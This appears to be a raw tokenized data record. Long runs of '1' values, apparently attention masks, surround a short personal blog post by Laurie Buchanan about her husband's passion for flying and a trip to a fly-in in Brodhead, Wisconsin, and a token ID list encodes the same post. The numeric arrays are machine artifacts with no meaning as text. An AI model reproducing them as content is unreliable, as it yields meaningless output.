1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
It’s no secret that Len has a mistress—flying. A private pilot, his heart accelerates when he hears the drone of an engine in the sky. We recently went to Brodhead, WI to attend the Pietenpol/Hatz Fly-In—a precursor to the famous annual EAA Fly-In that’s hosted in Oshkosh, WI. After 33 years of marriage there’s still nothing that makes me happier than seeing his kid-in-a-candy-store, split-faced grin! How does a small plane achieve liftoff, let alone a ginormous commercial plane with all that weight: passengers, baggage, and fuel? Len can explain it—with enthusiasm—in a New York minute! I don’t understand the mechanics behind flying, but what I do know is that he makes my heart soar—he’s the wind beneath my wings. Who or what is the wind beneath your wings? — Laurie Buchanan “Whatever you are not changing, you are choosing.” — Laurie Buchanan The Book — Discovering the Seven Selves The Experience — Life Harmony © 2013 Laurie Buchanan – All Rights Reserved Find me on Twitter @HolEssence Find me on Facebook
[ 1, 739, 30010, 29879, 694, 7035, 393, 16206, 756, 263, 5862, 1253, 30003, 29888, 5890, 29889, 13, 13, 29909, 2024, 19840, 29892, 670, 5192, 15592, 1078, 746, 540, 540, 1503, 278, 4192, 650, 310, 385, 6012, 297, 278, 14744, 29889, 1334, 10325, 3512, 304, 4358, 29881, 2813, 29892, 399, 29902, 304, 14333, 278, 14929, 264, 3733, 29914, 29950, 4101, 28738, 29899, 797, 30003, 29874, 8303, 5966, 304, 278, 13834, 17568, 382, 6344, 28738, 29899, 797, 393, 30010, 29879, 17791, 297, 438, 845, 29895, 10578, 29892, 399, 29902, 29889, 13, 13, 13555, 29871, 29941, 29941, 2440, 310, 13718, 727, 30010, 29879, 1603, 3078, 393, 3732, 592, 2250, 631, 1135, 8790, 670, 26397, 29899, 262, 29899, 29874, 29899, 29883, 13910, 29899, 8899, 29892, 6219, 29899, 17470, 287, 867, 262, 29991, 13, 13, 5328, 947, 263, 2319, 10694, 6176, 11747, 517, 600, 29892, 1235, 7432, 263, 330, 262, 555, 681, 12128, 10694, 411, 599, 393, 7688, 29901, 28134, 29892, 289, 16170, 482, 29892, 322, 26413, 29973, 16206, 508, 5649, 372, 30003, 2541, 23644, 3173, 29885, 30003, 262, 263, 1570, 3088, 11015, 29991, 13, 13, 29902, 1016, 30010, 29873, 2274, 278, 7208, 1199, 5742, 22764, 29892, 541, 825, 306, 437, 1073, 338, 393, 540, 3732, 590, 5192, 577, 279, 30003, 354, 30010, 29879, 278, 8805, 19540, 590, 24745, 29889, 13, 13, 22110, 470, 825, 338, 278, 8805, 19540, 596, 24745, 29973, 13, 13, 30003, 14019, 347, 10586, 273, 273, 13, 13, 30015, 8809, 5564, 366, 526, 451, 6480, 29892, 366, 526, 23906, 3178, 813, 14019, 347, 10586, 273, 273, 13, 13, 1576, 6726, 813, 8565, 957, 292, 278, 26647, 8365, 1960, 13, 13, 1576, 28224, 5597, 813, 4634, 28804, 2592, 13, 13, 30211, 29871, 29906, 29900, 29896, 29941, 14019, 347, 10586, 273, 273, 785, 2178, 26863, 2538, 9841, 13, 13, 12542, 592, 373, 20147, 732, 19984, 29923, 893, 663, 13, 13, 12542, 592, 373, 13327 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 